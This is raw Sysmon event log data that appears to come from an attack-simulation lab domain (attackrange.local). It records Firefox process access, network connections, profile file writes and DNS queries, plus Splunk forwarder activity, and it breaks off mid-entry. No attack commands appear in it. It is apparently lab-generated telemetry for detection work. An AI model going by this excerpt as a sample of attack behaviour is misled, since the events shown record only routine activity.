Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+ed6d5e|C:\Program Files\Mozilla Firefox\xul.dll+289542|C:\Program Files\Mozilla Firefox\xul.dll+28882f|C:\Program Files\Mozilla Firefox\xul.dll+28861a|C:\Program Files\Mozilla Firefox\xul.dll+eeff55|C:\Program Files\Mozilla Firefox\xul.dll+18b861a|C:\Program Files\Mozilla Firefox\xul.dll+1acc418|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1ace974|C:\Program Files\Mozilla Firefox\xul.dll+177715e|C:\Program Files\Mozilla Firefox\xul.dll+f245a2|C:\Program Files\Mozilla Firefox\xul.dll+1acb272|C:\Program Files\Mozilla Firefox\xul.dll+17779b9|C:\Program Files\Mozilla Firefox\xul.dll+1ac1e2c|C:\Program Files\Mozilla Firefox\xul.dll+f1ccb6|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e 10341000x8000000000000000104998Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.011{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+ed6d37|C:\Program Files\Mozilla Firefox\xul.dll+289542|C:\Program Files\Mozilla Firefox\xul.dll+28882f|C:\Program Files\Mozilla Firefox\xul.dll+28861a|C:\Program Files\Mozilla Firefox\xul.dll+eeff55|C:\Program Files\Mozilla Firefox\xul.dll+18b861a|C:\Program Files\Mozilla Firefox\xul.dll+1acc418|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1ace974|C:\Program Files\Mozilla Firefox\xul.dll+177715e|C:\Program Files\Mozilla Firefox\xul.dll+f245a2|C:\Program Files\Mozilla Firefox\xul.dll+1acb272|C:\Program Files\Mozilla Firefox\xul.dll+17779b9|C:\Program Files\Mozilla Firefox\xul.dll+1ac1e2c|C:\Program Files\Mozilla Firefox\xul.dll+f1ccb6|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e 10341000x8000000000000000104997Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.011{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+ed6d0c|C:\Program Files\Mozilla Firefox\xul.dll+289542|C:\Program Files\Mozilla Firefox\xul.dll+28882f|C:\Program Files\Mozilla Firefox\xul.dll+28861a|C:\Program Files\Mozilla Firefox\xul.dll+eeff55|C:\Program Files\Mozilla Firefox\xul.dll+18b861a|C:\Program Files\Mozilla Firefox\xul.dll+1acc418|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1ace974|C:\Program Files\Mozilla Firefox\xul.dll+177715e|C:\Program Files\Mozilla Firefox\xul.dll+f245a2|C:\Program Files\Mozilla Firefox\xul.dll+1acb272|C:\Program Files\Mozilla Firefox\xul.dll+17779b9|C:\Program Files\Mozilla Firefox\xul.dll+1ac1e2c|C:\Program Files\Mozilla Firefox\xul.dll+f1ccb6|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e 354300x8000000000000000104996Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:28.893{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcpfalsefalse127.0.0.1-51739-false127.0.0.1-51738- 354300x8000000000000000104995Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:28.893{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse127.0.0.1-51739-false127.0.0.1-51738- 23542300x8000000000000000105350Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.983{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\ADMINI~1\AppData\Roaming\Mozilla\Firefox\Profiles\P09S3I~1.DEF\cert9.db-journalMD5=959071A18F86FD1E2B9A552697A08605,SHA256=3EB00BDB2B4476FF969E0727B7188DE0EDCC9B8B2822D18086D1F743287DD142,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105349Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.952{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-walMD5=607956BAC012513BDDB796B6D6F3A7B2,SHA256=2444DF4E030453E637DAD3C8F342E5F66057E3ADFC9944CB02A23C01DAD9E088,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105348Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.952{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmMD5=F6C105E4EBB927BC1DF845048EACE5BE,SHA256=D13285080E8725942D1A04A07F695FDB4BA7292BACAF83B34CD7BF684D609FC2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105347Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.952{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|UNKNOWN(0000037E879B466F) 10341000x8000000000000000105346Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.952{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|UNKNOWN(0000037E879B466F) 10341000x8000000000000000105345Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.952{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|UNKNOWN(0000037E879B466F) 23542300x8000000000000000105344Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.936{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-journalMD5=174D0544449AB34356AF09B38BA9C020,SHA256=D90AD1F260F15E1FCBB3683A8FE6FF90221BC73D72B4208581E70D4E2D5DDB22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105343Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.915{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\ADMINI~1\AppData\Roaming\Mozilla\Firefox\Profiles\P09S3I~1.DEF\cert9.db-journalMD5=A38FE955CB7999F68BE41560DB8A9331,SHA256=6A577002E719DBD45064CA5B96D6F9C8622C6889416AF7BDC0346C3552505D1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105342Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.915{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-journalMD5=A9CF8FACD8238EF5AD9D85E19D98C3D5,SHA256=E3DD9231B1E028A31156F31DDB323BC09B5D45B0EC07E4BEB92DC68684880BE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105341Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.915{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walMD5=6D53F3FFEE96479FC03FC220FA4CDF3B,SHA256=9B59D08FAEBB3A1D632A8AC08F05760A302F8335BD04A14D7B0CE388E4BDE942,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105340Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.915{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|UNKNOWN(0000037E879B466F) 10341000x8000000000000000105339Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.915{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|UNKNOWN(0000037E879B466F) 10341000x8000000000000000105338Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.915{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|UNKNOWN(0000037E879B466F) 23542300x8000000000000000105337Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.915{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B0BAA2237492B310D3DA5376D1DDA6A4,SHA256=FE6D022B57AF30971E13CAD1E91D789FD04AF1994AF2A13D114F871EE6F0830F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105336Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.852{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|UNKNOWN(0000037E879B466F) 10341000x8000000000000000105335Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.852{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|UNKNOWN(0000037E879B466F) 10341000x8000000000000000105334Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.852{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|UNKNOWN(0000037E879B466F) 354300x8000000000000000105333Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.982{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51743-false52.222.214.84server-52-222-214-84.fra56.r.cloudfront.net443https 354300x8000000000000000105332Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.981{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local52538- 354300x8000000000000000105331Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.975{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local61470- 354300x8000000000000000105330Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.975{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51742-false52.222.214.84server-52-222-214-84.fra56.r.cloudfront.net443https 354300x8000000000000000105329Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.972{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local60585- 354300x8000000000000000105328Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.972{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51740-false34.107.221.8282.221.107.34.bc.googleusercontent.com80http 354300x8000000000000000105327Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.971{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local59783- 354300x8000000000000000105326Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.971{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64393- 354300x8000000000000000105325Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.970{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local60233- 354300x8000000000000000105324Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.970{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local62895- 354300x8000000000000000105323Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.965{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local52937- 354300x8000000000000000105322Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.964{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local57971- 354300x8000000000000000105321Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.964{58E9C193-ACA8-615A-1500-00000000FC01}1128C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local57971-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domain 23542300x8000000000000000105320Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.799{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walMD5=50DAB784321FE56B1F349CDB66848168,SHA256=0E398B21C047E2EC0F99CECAC710149348B729DE01372840A797878A0EDAC5B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105319Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.799{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B45288EDF5D672BAFD1D864FD55A3912,SHA256=D4AA3812EF2255296A8C14D3B4C1EB160FDCAB81ED4E7781DBEBEE1FC476743E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105318Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.782{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105317Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.768{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-walMD5=749FF25279A10342C9EDDACFF5162845,SHA256=EAF8F79735EEC84421B53E56F81C442EE70A24F4D77C9E5EE13AC25822409FDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105316Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.751{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=56321AA82D629BCB59EFCDD95F566AD7,SHA256=1E577D136EA38DEFEF2167522B84139D66400B2579392AAA2706EAACFB0DD3FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105315Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.735{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=446BF1409C02EF29692294080D55AEBE,SHA256=2FF320A0C80FC703604A1C3D79DA420AB739E99DB8FD321D4EA2FC216DE7C26D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105314Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.735{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EB241E0D340A6E3C9DEA0A864E0A998,SHA256=DF5BA2CAD90558DA2C80D77EFE484E4931FDD60B83523DD407ECE6BA913646DE,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000105313Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.989{58E9C193-B422-615A-0602-00000000FC01}5552example.org093.184.216.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105312Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.989{58E9C193-B422-615A-0602-00000000FC01}5552example.org0::ffff:93.184.216.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105311Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.978{58E9C193-B422-615A-0602-00000000FC01}5552prod.detectportal.prod.cloudops.mozgcp.net02600:1901:0:38d7::;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105310Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.976{58E9C193-B422-615A-0602-00000000FC01}5552prod.detectportal.prod.cloudops.mozgcp.net034.107.221.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105309Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.973{58E9C193-B422-615A-0602-00000000FC01}5552detectportal.firefox.com0type: 5 detectportal.prod.mozaws.net;type: 5 prod.detectportal.prod.cloudops.mozgcp.net;::ffff:34.107.221.82;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000082819Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.901{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B427-615A-7B01-00000000FD01}800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082818Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 